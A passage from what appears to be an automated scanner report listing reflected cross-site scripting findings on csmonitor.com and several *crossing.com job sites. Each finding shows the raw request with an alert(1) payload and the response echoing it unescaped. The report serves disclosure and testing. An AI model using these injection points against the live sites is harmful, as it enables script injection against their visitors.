Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f5kspj2g81754pnc3vhgter554; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149376

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.counselingcrossing.com/?662a5"><script>alert(1)</script>9af98f88fd9=1">
...[SNIP]...

3.35. http://www.cpluspluscrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cpluspluscrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84068"><script>alert(1)</script>76cfc652e34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?84068"><script>alert(1)</script>76cfc652e34=1 HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gj2r0hmde0qmmm07o2jddtilj0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114876

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.cpluspluscrossing.com/?84068"><script>alert(1)</script>76cfc652e34=1">
...[SNIP]...

3.36. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fb27"-alert(1)-"1739995f90e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /USA2fb27"-alert(1)-"1739995f90e/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:11 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:25:11 GMT
Date: Fri, 21 Jan 2011 22:25:11 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA2fb27"-alert(1)-"1739995f90e/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.37. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab91"-alert(1)-"1faa5b06e1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /USA/20101ab91"-alert(1)-"1faa5b06e1f/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:19 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86392
Expires: Sat, 22 Jan 2011 22:25:11 GMT
Date: Fri, 21 Jan 2011 22:25:19 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/20101ab91"-alert(1)-"1faa5b06e1f/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.38. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e99ca"-alert(1)-"45e4a32e5f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /USA/2010/1228e99ca"-alert(1)-"45e4a32e5f7/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:31 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86355
Expires: Sat, 22 Jan 2011 22:24:46 GMT
Date: Fri, 21 Jan 2011 22:25:31 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/2010/1228e99ca"-alert(1)-"45e4a32e5f7/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.39. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37c15"-alert(1)-"4ca3ca944b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal37c15"-alert(1)-"4ca3ca944b5 HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:54 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:25:54 GMT
Date: Fri, 21 Jan 2011 22:25:54 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal37c15"-alert(1)-"4ca3ca944b5";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.40. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d082"-alert(1)-"de38b5e98a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /USA1d082"-alert(1)-"de38b5e98a6/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:14 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86399
Expires: Sat, 22 Jan 2011 22:25:13 GMT
Date: Fri, 21 Jan 2011 22:25:14 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA1d082"-alert(1)-"de38b5e98a6/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.41. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd583"-alert(1)-"06ddd227669 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /USA/Politicscd583"-alert(1)-"06ddd227669/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:23 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86374
Expires: Sat, 22 Jan 2011 22:24:57 GMT
Date: Fri, 21 Jan 2011 22:25:23 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politicscd583"-alert(1)-"06ddd227669/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.42. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54f7f"-alert(1)-"984baab725b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /USA/Politics/monitor_breakfast54f7f"-alert(1)-"984baab725b/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:37 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:25:38 GMT
Date: Fri, 21 Jan 2011 22:25:38 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast54f7f"-alert(1)-"984baab725b/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.43. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ac7e"-alert(1)-"619fa0f46a4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /USA/Politics/monitor_breakfast/20111ac7e"-alert(1)-"619fa0f46a4/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:52 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86378
Expires: Sat, 22 Jan 2011 22:25:31 GMT
Date: Fri, 21 Jan 2011 22:25:53 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast/20111ac7e"-alert(1)-"619fa0f46a4/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.44. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d96a6"-alert(1)-"8cef4f02abe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /USA/Politics/monitor_breakfast/2011/0105d96a6"-alert(1)-"8cef4f02abe/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:26:04 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:26:05 GMT
Date: Fri, 21 Jan 2011 22:26:05 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast/2011/0105d96a6"-alert(1)-"8cef4f02abe/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.45. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60b23"-alert(1)-"9fda35e2e30 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity60b23"-alert(1)-"9fda35e2e30 HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:26:15 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86373
Expires: Sat, 22 Jan 2011 22:25:49 GMT
Date: Fri, 21 Jan 2011 22:26:16 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity60b23"-alert(1)-"9fda35e2e30";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.46. http://www.customerservicecrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.customerservicecrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8654b"><script>alert(1)</script>5d8c4dcbe63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8654b"><script>alert(1)</script>5d8c4dcbe63=1 HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eq95mr8o98fkhjs3ktog20fuf3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119276

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.customerservicecrossing.com/?8654b"><script>alert(1)</script>5d8c4dcbe63=1">
...[SNIP]...

3.47. http://www.dbacrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dbacrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd83"><script>alert(1)</script>ed7396c311c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4fd83"><script>alert(1)</script>ed7396c311c=1 HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eph2bliclbes6e30d2h8tu8tq4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125729

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.dbacrossing.com/?4fd83"><script>alert(1)</script>ed7396c311c=1">
...[SNIP]...

3.48. http://www.dentalcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dentalcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0261"><script>alert(1)</script>118fbccd4ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e0261"><script>alert(1)</script>118fbccd4ca=1 HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t7apdouasjul5pdruunarl3np6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
